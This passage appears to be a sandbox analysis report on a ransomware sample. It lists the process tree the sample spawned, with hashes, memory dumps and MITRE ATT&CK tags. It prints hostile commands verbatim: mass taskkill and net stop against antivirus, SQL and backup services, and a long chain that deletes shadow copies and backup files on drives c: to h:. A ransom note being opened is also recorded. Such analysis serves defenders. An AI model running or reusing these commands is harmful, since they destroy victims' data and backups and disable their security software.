  "C:\Windows\System32\cmd.exe" /C taskkill /IM sqlagent.exe /F
  2⤵
  PID:9176
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM sqlagent.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:6160
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM sqbcoreservice.exe /F
  2⤵
  PID:5456
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM sqbcoreservice.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:8284
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM thebat64.exe /F
  2⤵
  PID:5596
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM thebat64.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:6816
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM winword.exe /F
  2⤵
  PID:6556
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM winword.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:8436
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM visio.exe /F
  2⤵
  PID:9400
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM visio.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1240
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM thunderbird.exe /F
  2⤵
  PID:5176
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM thunderbird.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:8152
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop kavfsslp /y
  2⤵
  PID:5564
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQLAgent$SOPHOS /y
  2⤵
  PID:4424
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$SOPHOS /y
    3⤵
    PID:6120
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
      4⤵
      PID:6496
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop EhttpSrv /y
  2⤵
  PID:3996
- - C:\Windows\SysWOW64\net.exe
    net stop EhttpSrv /y
    3⤵
    PID:10108
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop EhttpSrv /y
      4⤵
      PID:9244
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM wordpad.exe /F
  2⤵
  PID:1688
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM wordpad.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2312
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM PccNTMon.exe /F
  2⤵
  PID:8864
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7380
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM PccNTMon.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:6628
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM Ntrtscan.exe /F
  2⤵
  PID:9540
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM Ntrtscan.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:9056
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM CNTAoSMgr.exe /F
  2⤵
  PID:2392
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM CNTAoSMgr.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:7972
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM mbamtray.exe /F
  2⤵
  PID:7132
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM mbamtray.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5148
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM tmlisten.exe /F
  2⤵
  PID:10060
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM tmlisten.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4600
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /all /quiet && vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB && vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded && vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB && vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded && vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB && vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded && vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB && vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded && vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB && vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded && vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB && vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded && vssadmin Delete Shadows /all /quiet && del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk && del /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk && del /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk && del /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win f:\*.dsk && del /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win g:\*.dsk && del /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win h:\*.dsk && del %0
  2⤵
  PID:10112
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6124
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /IM xfssvccon.exe /F
  2⤵
  PID:8760
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM xfssvccon.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:7472
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop NetMsmqActivator /y
  2⤵
  PID:5324
- - C:\Windows\SysWOW64\net.exe
    net stop NetMsmqActivator /y
    3⤵
    PID:6808
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop NetMsmqActivator /y
      4⤵
      PID:6832
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQLAgent$PROD /y
  2⤵
  PID:5636
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$PROD /y
    3⤵
    PID:3336
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PROD /y
      4⤵
      PID:5936
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop MSSQLServerADHelper /y
  2⤵
  PID:7940
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLServerADHelper /y
    3⤵
    PID:2420
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper /y
      4⤵
      PID:10144
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop swi_update_64 /y
  2⤵
  PID:8908
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQLBrowser /y
  2⤵
  PID:10028
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQLAgent$VEEAMSQL2012 /y
  2⤵
  PID:10016
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:9980
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQLAgent$TPSAMA /y
  2⤵
  PID:9964
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop SQLAgent$TPS /y
  2⤵
  PID:9932

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1072

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLsafe Backup Service /y
1⤵
PID:7156
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop ReportServer$TPS /y
  2⤵
  PID:7720

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
1⤵
PID:8988

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:8988

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
1⤵
PID:6916
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop swi_update_64 /y
  2⤵
  PID:6464

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
1⤵
PID:6164
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop tmlisten /y
  2⤵
  PID:2028

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:6856

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
1⤵
PID:8148

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
1⤵
PID:2760

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
1⤵
PID:9028

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL80 /y
1⤵
PID:8072

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RESvc /y
1⤵
PID:9200

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
1⤵
PID:6480

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
1⤵
PID:5628

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$VEEAMSQL2012 /y
1⤵
PID:7296
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
  2⤵
  PID:6984

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$TPSAMA /y
1⤵
PID:5568
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
  2⤵
  PID:7380

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
1⤵
PID:3872

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$TPS /y
1⤵
PID:5920
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop SQLAgent$TPS /y
  2⤵
  PID:7848

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$VEEAMSQL2008R2 /y
1⤵
PID:5720
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:5344

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
1⤵
PID:4024

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
1⤵
PID:1688

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
1⤵
PID:5260

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
1⤵
PID:5096

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
1⤵
PID:8100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
1⤵
PID:6124

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_filter /y
1⤵
PID:10212

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
1⤵
PID:6160

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
1⤵
PID:8444

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
1⤵
PID:7840

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
1⤵
PID:8112

C:\Windows\SysWOW64\net.exe
net stop swi_update_64 /y
1⤵
PID:6916

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:7336

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
1⤵
PID:9064

C:\Windows\SysWOW64\net.exe
net stop kavfsslp /y
1⤵
PID:9004
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop kavfsslp /y
  2⤵
  PID:5316

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
1⤵
PID:512

C:\Windows\SysWOW64\net.exe
net stop SQLBrowser /y
1⤵
PID:8224

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:8224

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\ransom.jpg" /ForceBootstrapPaint3D
1⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:9104

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AVP /y
1⤵
PID:5344

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
1⤵
PID:10208

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfefire /y
1⤵
PID:5464

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
1⤵
PID:8524

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
1⤵
PID:7828

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\READ_IT.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:5300

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:6576

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Desktop\READ_IT.txt

Filesize
780B

MD5
9e01eab1c4f3447dc8d464cc7ed816e0

SHA1
9d3afa3a33f829341be80b1d5d368f1ff1d77bb6

SHA256
d92bd6a63da152e47eb2560a14dc62eadc58bb2c092b347ce92427a94a061fb9

SHA512
b6da7ffdfda3d66f0d55b2638ee2b0b51886152da2ec23a6c2ace69421052c833017f930a6514585f1bca334f51b4d527c5389cd956f5e58e37f1df925430045

Download Submit
memory/4440-135-0x0000000005280000-0x000000000528A000-memory.dmp

Filesize
40KB

Download
memory/4440-133-0x0000000009C70000-0x000000000A214000-memory.dmp

Filesize
5.6MB

Download
memory/4440-134-0x00000000052E0000-0x0000000005372000-memory.dmp

Filesize
584KB

Download
memory/4440-132-0x0000000000750000-0x000000000078A000-memory.dmp

Filesize
232KB

Download